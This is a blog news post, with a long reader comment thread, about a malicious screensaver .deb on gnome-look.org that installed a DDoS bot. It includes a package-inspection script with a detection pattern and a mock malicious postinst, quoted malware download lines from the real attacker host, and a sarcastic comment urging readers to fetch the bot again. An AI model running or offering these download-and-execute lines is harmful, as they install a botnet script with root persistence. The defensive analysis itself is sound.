Malware Hidden Inside Screensaver On Gnome-Look

Malware has been found hidden inside an innocuous-looking ‘waterfall’ screensaver .deb file made available on the popular artwork sharing site Gnome-Look.org.
The .deb contains no screensaver at all: installing it (which dpkg does as root) plants a script with elevated privileges that is designed to take part in a DDoS attack and to keep itself updated by downloading fresh copies.

The dodgy screensaver in question has since been removed from gnome-look, and this incident was a very basic, if potentially effective, attempt.

If anything this incident highlights the need to be careful what you download and where you download it from.
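Because dpkg runs a package's maintainer scripts as root, the sensible check before installing anything from an artwork site is to look inside the .deb first. The script below is an added example, not something from the article or from gnome-look: it lists what a package would install and greps its maintainer scripts for behaviour a theme or screensaver has no reason to need. The constructed sample postinst only mimics what the article describes (a script dropped into /usr/bin, hooked in via /etc/profile.d, updated over the network); the URL in it is a placeholder, not the real package's.

```shell
#!/bin/sh
# Added example: inspect a .deb before installing it. dpkg runs the package's
# maintainer scripts (preinst/postinst/prerm/postrm) as root, which is exactly
# how a "screensaver" can plant something in /usr/bin and /etc/profile.d.
set -eu

# scan_maintainer_scripts DIR: grep the maintainer scripts extracted into DIR
# for things a theme or screensaver should never do. Prints matching lines.
# Returns 0 when nothing matched, 1 when something did. Heuristic, not proof.
scan_maintainer_scripts() {
    dir=$1
    found=0
    for s in preinst postinst prerm postrm; do
        f="$dir/$s"
        [ -f "$f" ] || continue
        # network fetches, world-writable files, login hooks, cron, drops into /usr/bin
        if grep -nHE 'wget|curl|chmod +[0-7]*777|/etc/profile\.d|/etc/cron|/usr/bin/' "$f"; then
            found=1
        fi
    done
    return $found
}

# inspect_deb FILE.deb: show what the package would install, then scan its
# maintainer scripts. Only dpkg-deb is used; nothing gets installed.
inspect_deb() {
    deb=$1
    ctl=$(mktemp -d)
    echo "== files $deb would install =="
    dpkg-deb -c "$deb"
    echo "== maintainer scripts =="
    dpkg-deb -e "$deb" "$ctl"
    if scan_maintainer_scripts "$ctl"; then
        echo "no obviously suspicious lines (still read the scripts yourself)"
    else
        echo "SUSPICIOUS lines above: do not install this package"
    fi
    rm -rf "$ctl"
}

# make_sample_postinst: write a constructed postinst modelled on the behaviour
# the article describes. The URL is a placeholder, not the real one.
make_sample_postinst() {
    dir=$(mktemp -d)
    cat > "$dir/postinst" <<'EOF'
#!/bin/sh
cd /usr/bin
wget http://example.invalid/Bots/run.bash
chmod 777 run.bash
echo '/usr/bin/run.bash &' > /etc/profile.d/gnome.sh
EOF
    printf '%s\n' "$dir"
}

# Usage: sh inspect_deb.sh some-theme.deb
# With no argument, run the scanner over the constructed sample instead.
if [ $# -gt 0 ]; then
    inspect_deb "$1"
else
    sample=$(make_sample_postinst)
    scan_maintainer_scripts "$sample" || echo "sample postinst flagged, as expected"
    rm -rf "$sample"
fi
```

The grep list is deliberately short and will produce false positives on some legitimate packages; the point is to make you read the postinst, not to replace reading it.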

The Fix
If you fear you may have downloaded or installed the screensaver (which doesn’t actually install a screensaver), run the following command in a terminal or seek help from the fix thread on the Ubuntu forums. Note that the last two arguments, index.php and run.bash, carry no path, so they are removed from whatever directory your terminal is currently in: run it from a directory where those names mean nothing to you, or give them a full path.

DO NOT RUN THIS COMMAND UNLESS YOU HAVE INSTALLED THE .DEB IN QUESTION.

  • sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552
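A safer way to apply the same fix is to dry-run it first and refuse anything that is not an absolute path, so nothing is deleted relative to the current directory. The script below is an added example, not the article’s command and not from the forum thread. It assumes the package name app5552 from the command above, puts index.php and run.bash in /usr/bin (the location the forum post quoted in the comments reports), and also checks the invoking user’s home for the copies a later variant is said to drop there; those paths are assumptions, not a complete list of what every variant does.

```shell
#!/bin/sh
# Added example: dry-run-first clean-up that only ever deletes absolute paths
# and first checks that the package is actually installed.
# Run as:  sudo sh cleanup.sh        (report only)
#          sudo sh cleanup.sh --yes  (remove)
set -eu

PKG=app5552

# require_absolute PATH...: fail if any path is relative. The bare
# "index.php run.bash" in the one-liner above would resolve under $PWD.
require_absolute() {
    for p in "$@"; do
        case $p in
            /*) ;;
            *) echo "refusing relative path: $p (would resolve to $PWD/$p)" >&2; return 1 ;;
        esac
    done
}

# list_existing PATH...: print only the paths that are present, one per line,
# so the user sees exactly what would go before anything is deleted.
list_existing() {
    for p in "$@"; do
        [ -e "$p" ] && printf '%s\n' "$p"
    done
    return 0
}

# fix_paths: the locations named in the article and the comment thread
# (assumed; the /usr/bin and home copies cover the two variants described).
# Under sudo $HOME may be root's, so resolve the invoking user's home instead.
fix_paths() {
    home=${SUDO_USER:+$(getent passwd "$SUDO_USER" | cut -d: -f6)}
    home=${home:-$HOME}
    printf '%s\n' /usr/bin/Auto.bash /usr/bin/run.bash /usr/bin/index.php \
        /etc/profile.d/gnome.sh "$home/index.php" "$home/run.bash"
}

# cleanup [--yes]: report, and remove only when asked to.
cleanup() {
    if ! dpkg -s "$PKG" >/dev/null 2>&1; then
        echo "$PKG is not installed; this fix does not apply to this machine"
        return 0
    fi
    paths=$(fix_paths)
    # shellcheck disable=SC2086  # splitting $paths on newlines is intended
    require_absolute $paths
    echo "files from the list that exist on this machine:"
    list_existing $paths
    if [ "${1:-}" = "--yes" ]; then
        for p in $paths; do rm -f "$p"; done
        dpkg -r "$PKG"
    else
        echo "dry run only; check the list (a ~/index.php may be your own file), then re-run with --yes"
    fi
}

cleanup "${1:-}"
```

The dry run is the part that matters: the comment thread below shows how easily `sudo rm -f index.php` lands in the wrong directory, and a home-directory index.php is not necessarily the malware’s.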

Thanks to Noah for the tip-off.

Related posts:

  1. 'Caffeine' – App To Delay Screensaver/Suspend
  • Noah

    Oops – it seems a bit is left out.

    sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552

    Is the command.

    • Mike

      You have no full path for “index.php” and “run.bash”… that would probably be wise…

      • Noah

        We know the path – it’s downloaded into your home, so it’s fine.

        • Al3x

          It’s not fine…
          1] User could run it e.g. in his web dir or anywhere else… So sudo rm $HOME/index.php would be better. But still:
          2] You should at least warn readers that they should check the index.php file. Some users may have (for some reason) index.php file in their home that they don’t want to delete..
          3] Suggesting “sudo rm -f …” commands as a magic trick everybody should run without really explaining and warning what they do is not a very good idea in general.

          • Noah

            The script (of the hacker) will delete any index.php they have in their home anyway. Also, any run.bash they have.

          • al3x

            But not in their home, but in their current working directory, that should be really stressed there!

            cd work/my_web/project
            : do some work
            : read this article
            sudo rm -f index.php

            sudo pwd # (!!!)

          • al3x

            That’s why I proposed at least do:
            sudo rm -f $HOME/index.php

            That would correctly translate to home of the user that run the command. Not just working directory, that could be almost anything!

          • http://steve-parker.org/ Steve Parker

            http://ubuntuforums.org/showpost.php?p=8463766&postcount=5 says that it downloads index.php into /usr/bin, not into $HOME, and then deletes index.php anyway:
            cd /usr/bin/
            wget http://05748.t35.com/Bots/index.php
            wget http://05748.t35.com/Bots/run.bash
            sleep 4
            rm index.php

          • Noah

            It depends – the new script downloads into the home.

            However, I agree, for some cases, anyway, these commands should be run if you think you have it (nobody has it now).
            I have also seen one or two “remixes of it” by now, mostly by incapable people, but anyway, to remove them for sure -

            sudo rm -f /usr/bin/index.php /usr/bin/run.bash /usr/bin/gnomethemeing.sh /$HOME/index.php /$HOME/Desktop/index.php /$HOME/run.bash /$HOME/Desktop/run.bash

            This won’t be necessary unless you’re downloading these things – thank god for VM’s to try it out in ;)

    • Mark S

      No, no. The correct command is:

      cd /usr/bin/ && rm Auto.bash && sleep 1 && wget http://05748.t35.com/Bots/Auto.bash && chmod 777 Auto.bash

      Linux users know that the best way to protect and clean your system is to copy and paste commands from the Internet that you don’t understand.

  • Anonymous

    wow this is a little scary, i download a lot of stuff from gnome-look.

    • Noah

      It will be fine as long as you don’t download debs from there.
      We have repos for a reason. They are there to protect us. They have safe software, so you don’t have to look on the web and perhaps download the wrong software.

      • pt

        depends on which repo

        would it be harder to have a malicious script be part of a deb file in a PPA repo?

        • Noah

          100% Safe. And if you think one isn’t, report it to launchpad.

          • Anonymous

            100% safe, unless it isn’t!

            Launchpad PPAs are attack vectors like any other third-party repository. If you are installing packages not provided by your distribution or software vendor you should always use caution; base security of any system is defined by user stupidity, always remember this.

  • Angelo Joseph

    i download a lotta stuff on gnome-look. I agree rather scary!!

  • Anonymous

    I read about this on the forum a couple of hours ago, scary stuff really as many people including myself use Gnome Look to download themes, screen-savers & wallpapers.

  • Anonymous

    I knew it was only a matter of time before linux was a target to virus attacks, Thanks ClamAV!

  • Mohan

    Wow…this goes to show you that Ubuntu (Debian based Linux) is getting popular.

    • http://www.cigreds.com/ Electronic Cigarette Girl

      Ubuntu is awesome but not being a dev or even having the slightest idea about linux, I have to say there were times I had my back against the wall and had to get my programmer buddies to help me out.

      There will be a HUGE market for Ubuntu or any open source OS once it becomes more friendly to noobs like me lol

      -Bella :)

      • Mohan

        Yes I agree. But with each release I think it’s getting easier and easier. 10 years ago it was very much different and difficult (half the time I had a hard time installing it on my computer).

  • http://twitter.com/Paul3142 Paul

    Be it Windows, Linux, Mac or whatever, if you run software and you aren’t 100% sure that its safe, then you run a risk of this type of thing happening.

    As mentioned before, repos are 100% safe.

  • AW

    This is, in my opinion, why the security privilege system in Windows Vista and Linux/Gnome/KDE doesn’t work — security is designed in these OS’ to be “all or nothing.”

    As in, “give me the keys to the castle or you can’t install anything.”

    Why does a screensaver need access to the whole damn system? Why can’t it be isolated to one directory — the one where it belongs?

    • Anonymous

      It can, but it’s more of a hassle than it’s worth. Chroot jails are a pain to setup and even then you need root to access the dpkg database for write access or run pre/post install scripts. At the end of the day you can only protect users so much from their own stupidity.

    • http://steve-parker.org/ Steve Parker

      SELinux allows just this kind of fine-grained control. But it can be a pain to manage. It can also control all sorts of other things, such as self-modifying executables, and so on.

      As yourself, you have access to your own ~/.ssh directory, so Firefox, running as your UserID, also has access to your keys. A web browser doesn’t need access to ssh keys, so SELinux blocks it from accessing them. Similarly, in this case – screensaver-installers could have their own context, that they are allowed to update /usr/share/themes or whatever, but not elsewhere.

      SELinux is not simple to understand, so most distros disable it by default, especially (ironically) the user-focussed ones such as Ubuntu.

      • Yfrwlf

        It is silly that more work isn’t done on making Linux more secure then. I know that it isn’t done because there’s usually no need, but waiting until there are attacks like these is a bit foolish. Maybe Ubuntu/Debian should start taking measures to further secure their systems now though rather than later. You can’t always protect a user against themselves, and Linux is capable of doing *anything* if you give it permission to, so the answer is use more finely-grained security which thankfully is being done to some degree (with PolicyKit).

        • http://steve-parker.org/ Steve Parker

          Installing and running code downloaded from a non-trusted site is the foolish behaviour.

          If you tell the system “Yes, I do want to do this” then it will do it, just as your car will obediently drive you over a cliff if you so command it.

          As I mentioned, there are protections already in place in the form of SELinux, but most users do not want it. Security is a spectrum, with most-secure at one extreme, and most-usable at the other extreme. By installing untrusted, unverified third-party software as root, the user is stating that they are not particularly interested in the security of their system.

          • Yfrwlf

            “If you tell the system “Yes, I do want to do this” then it will do it, just as your car will obediently drive you over a cliff if you so command it.”

            Yes, and thus the answer, as far as security is concerned, is to only give programs the permissions they *need*, and thus you protect your system more. Like in the example of, say, a screen saver package being confined to that part of the system during installation. That’s more safe than giving an installation package *total root-level control* over the entire system. That’s what fine-grained security is all about. There’s a lot of other things you can do too, like sandboxing, etc, so, my point is you can’t say “it’s all or nothing, and there’s nothing that can be done” because there are certain things that can be done to help make things MORE secure, but ultimately yes, you can do what you want and screw up your system if you really want to do so. You just normally need root permission to do so at least. ^^

          • Yfrwlf

            (Which is why PackageKit is nice, because you’re not giving something total root-level control, thus making it hard for something malicious to hose your entire system.)

          • http://steve-parker.org/ Steve Parker

            I am not saying “it’s all or nothing” – there is SELinux, ACLs, all sorts of more fine-grained protection mechanisms, but the typical Ubuntu user does not want to be bothered with configuring these, or – if system defaults are provided – working out why one operation fails when another similar operation succeeds. Russell Coker has a SELinux play machine at play.coker.com.au which has a publicly available root password. The box is sufficiently covered by SELinux to protect it from malicious use. It is absolutely possible to do such things with Linux.

            So it does not make sense to say that “It is silly that more work isn’t done on making Linux more secure” – of the user-friendly desktop OSes, it has more security than the others. Of the secure OSes, it is more user-friendly than the others.

            I don’t really see how much more somebody could want. And, as always, complaining that a feature is missing without contributing anything (code, time, etc) oneself is not normally very productive :-)

          • Yfrwlf

            Good, and of course GNU/Linux and other OS OSes will no doubt continue to lead the way as far as security is concerned, adopting the best practices and concepts. No, making problems known is very important and useful, and the Linux community needs to complain and make problems very well known when they do happen because Linux is *for Linux users*. If someone doesn’t want to fix it, fine, but someone who does may do so. Just because someone isn’t a programmer doesn’t mean their difficulties or problems with Linux are invalid. Contributing bug reports or just simply *commenting*, anywhere on the net, about a problem, is more useful than *nothing* at all.

          • Yfrwlf

            (And this particular blogger seems to very much agree with me on that point. It goes both ways, and some comments can be extremely unhelpful and non-constructive, so certainly it is better to have someone who takes the time to fill out a bug report, or who has the knowledge to dive into what exactly might be wrong, but they don’t *need* or *have* to do those things, and making them feel that they do is just going to push them away and make them feel unwelcome as a Linux user, and that they are stranded.)

          • http://steve-parker.org/ Steve Parker

            I did say “contributing anything (code, time, etc)”. Writing good bug reports is a very valuable contribution to the community. Complaining that the system works exactly as designed, is useful as part of a constructive design review evaluating realistic alternatives.

          • Sam

            I’m not trying to ignore the fact that the material comes from a 3rd party source, but I also never really looked at gnome-look as an “untrusted source.” I hate someone had to do this to wake me up a little, I like my fairy-tale world where I can test as many things as I like w/o worry.

  • ruel24

    Okay, this highlights why you shouldn’t download and install from outside your distros repos and trusted 3rd party repos. The repo maintainers ensure you won’t get crap like this. Installing outside the repos opens you up to possible security breaches.

    • Sebastien

      Right. You should stick with the repos and only use outdated software. You don’t need the latest version of Firefox. Wait 6 months.

  • SquishBug

    Where can I get the deb to dissect its inner workings and see what it/whomever was trying to do? :)

  • tomas

    In the command you posted isn’t index.php & run.bash missing their paths?

  • http://gnuski.blogspot.com/ lefty.crupps

    Just another reason to trust official repositories and not Windows-installer-type download-and-doubleclick. No, PPAs are not 100% safe; all repos are as safe as the maintainer and the amount of trust you can put into that PPA. Anyone could create a PPA with this malware.

    Also another opportunity to advocate for Ubuntu to have its own package format extension (.ubu not .deb), to help maintain the brand identity of Debian and Ubuntu both.

  • http://blog.ibeentoubuntu.com/ Daeng Bo

    It looks like someone read the last paragraph of my howto: http://blog.ibeentoubuntu.com/2009/03/how-to-create-drive-by-download-for.html

  • Noah

    Update: Another theme has been uploaded (which will do the same). Ninja Theme was the name; it has been removed now. If anyone has installed/downloaded this from gnome-look, please can you contact us at the Ubuntuforums.org, as there is some vital information we need from that file so we can produce the cure.

  • Bob Dobbs Jr.

    Actually I find this to be a positive example of the swiftness and acuity at which these jokers are dealt with within the Linux community.

  • Sam

    This kind of thing makes me worry a little since I like tweaking the themes and icons so much. I never really bother with the screen savers. I have had an ongoing problem with power/screen saver settings not keeping the setting I put in place to never come on. I haven’t tweaked the start settings on this install so that may be the problem. Anyhow, thanks for the 411, I just discovered your blog and it’s great!

  • http://ninjashoes.net mixed martial arts

    Wow, I am surprised about this. I am glad I don’t bother with funky screensavers. I only have the opengl screensaver pack.

